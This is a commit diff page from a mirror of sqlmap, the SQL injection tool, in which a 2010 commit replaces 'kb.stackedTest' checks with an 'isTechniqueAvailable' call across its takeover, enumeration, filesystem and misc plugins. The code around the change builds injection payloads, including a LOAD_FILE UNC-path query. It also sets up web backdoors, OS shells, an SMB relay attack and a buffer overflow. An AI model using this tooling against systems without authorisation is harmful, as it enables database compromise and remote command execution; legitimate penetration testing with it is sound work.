PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2026-01-21 05:39:16 +00:00
Code Issues Projects Releases Wiki Activity

update

Browse Source
This commit is contained in:
Miroslav Stampar
2010-12-18 15:57:47 +00:00
parent 21d083272e
commit 36862e2efa
9 changed files with 35 additions and 40 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
plugins/dbms/mysql/takeover.py
View File

@@ -10,12 +10,14 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.agent import agent
from lib.core.common import isTechniqueAvailable
from lib.core.common import normalizePath
from lib.core.common import ntToPosixSlashes
from lib.core.common import randomStr
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import PAYLOAD
from lib.request import inject
from lib.request.connect import Connect as Request
@@ -100,7 +102,7 @@ class Takeover(GenericTakeover):
logger.debug("keeping existing UDF '%s' as requested" % udf)
def uncPathRequest(self):
if not kb.stackedTest:
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
query = agent.prefixQuery("AND LOAD_FILE('%s')" % self.uncPath)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)

4
plugins/generic/enumeration.py
View File

@@ -18,6 +18,7 @@ from lib.core.common import getConsoleWidth
from lib.core.common import getFileItems
from lib.core.common import getUnicode
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import parsePasswordHash
from lib.core.common import parseSqliteTableSchema
from lib.core.common import popValue
@@ -34,6 +35,7 @@ from lib.core.data import paths
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapMissingMandatoryOptionException
from lib.core.exception import sqlmapNoneDataException
from lib.core.exception import sqlmapUnsupportedFeatureException
@@ -1758,7 +1760,7 @@ class Enumeration:
return output
else:
if not kb.stackedTest and not conf.direct:
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
warnMsg = "execution of custom SQL queries is only "
warnMsg += "available when stacked queries are supported"
logger.warn(warnMsg)

10
plugins/generic/filesystem.py
View File

@@ -13,12 +13,14 @@ import os
from lib.core.agent import agent
from lib.core.common import dataToOutFile
from lib.core.common import isTechniqueAvailable
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapUndefinedMethod
from lib.request import inject
@@ -254,8 +256,8 @@ class Filesystem:
self.checkDbmsOs()
if conf.direct or kb.stackedTest:
if kb.stackedTest:
if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
debugMsg = "going to read the file with stacked query SQL "
debugMsg += "injection technique"
logger.debug(debugMsg)
@@ -294,8 +296,8 @@ class Filesystem:
def writeFile(self, wFile, dFile, fileType=None, confirm=True):
self.checkDbmsOs()
if conf.direct or kb.stackedTest:
if kb.stackedTest:
if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
debugMsg = "going to upload the %s file with " % fileType
debugMsg += "stacked query SQL injection technique"
logger.debug(debugMsg)

4
plugins/generic/misc.py
View File

@@ -10,6 +10,7 @@ See the file 'doc/COPYING' for copying permission
import re
from lib.core.common import getCompiledRegex
from lib.core.common import isTechniqueAvailable
from lib.core.common import normalizePath
from lib.core.common import ntToPosixSlashes
from lib.core.common import posixToNtSlashes
@@ -19,6 +20,7 @@ from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapNoneDataException
from lib.core.exception import sqlmapUnsupportedFeatureException
from lib.core.session import setRemoteTempPath
@@ -94,7 +96,7 @@ class Miscellaneous:
Cleanup database from sqlmap create tables and functions
"""
if not kb.stackedTest and not conf.direct:
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
return
if kb.os == "Windows":

20
plugins/generic/takeover.py
View File

@@ -9,12 +9,14 @@ See the file 'doc/COPYING' for copying permission
import os
from lib.core.common import isTechniqueAvailable
from lib.core.common import readInput
from lib.core.common import runningAsAdmin
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapMissingDependence
from lib.core.exception import sqlmapMissingMandatoryOptionException
from lib.core.exception import sqlmapMissingPrivileges
@@ -40,9 +42,9 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
Abstraction.__init__(self)
def osCmd(self):
if kb.stackedTest or conf.direct:
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct:
web = False
elif not kb.stackedTest and kb.dbms == DBMS.MYSQL:
elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and kb.dbms == DBMS.MYSQL:
infoMsg = "going to use a web backdoor for command execution"
logger.info(infoMsg)
@@ -61,9 +63,9 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
self.cleanup()
def osShell(self):
if kb.stackedTest or conf.direct:
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct:
web = False
elif not kb.stackedTest and kb.dbms == DBMS.MYSQL:
elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and kb.dbms == DBMS.MYSQL:
infoMsg = "going to use a web backdoor for command prompt"
logger.info(infoMsg)
@@ -149,7 +151,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
if kb.dbms in ( DBMS.MYSQL, DBMS.PGSQL ):
self.sysUdfs.pop("sys_bineval")
if kb.stackedTest or conf.direct:
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct:
web = False
self.getRemoteTempPath()
@@ -204,7 +206,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
self.uploadIcmpshSlave(web=web)
self.icmpPwn()
elif not kb.stackedTest and kb.dbms == DBMS.MYSQL:
elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and kb.dbms == DBMS.MYSQL:
web = True
infoMsg = "going to use a web backdoor to establish the tunnel"
@@ -252,7 +254,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
errMsg += "relay attack"
raise sqlmapUnsupportedDBMSException(errMsg)
if not kb.stackedTest and not conf.direct:
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
if kb.dbms in ( DBMS.PGSQL, DBMS.MSSQL ):
errMsg = "on this back-end DBMS it is only possible to "
errMsg += "perform the SMB relay attack if stacked "
@@ -294,7 +296,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
self.smb()
def osBof(self):
if not kb.stackedTest and not conf.direct:
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
return
if not kb.dbms == DBMS.MSSQL or kb.dbmsVersion[0] not in ( "2000", "2005" ):
@@ -320,7 +322,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
raise sqlmapUndefinedMethod, errMsg
def __regInit(self):
if not kb.stackedTest and not conf.direct:
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
return
self.checkDbmsOs()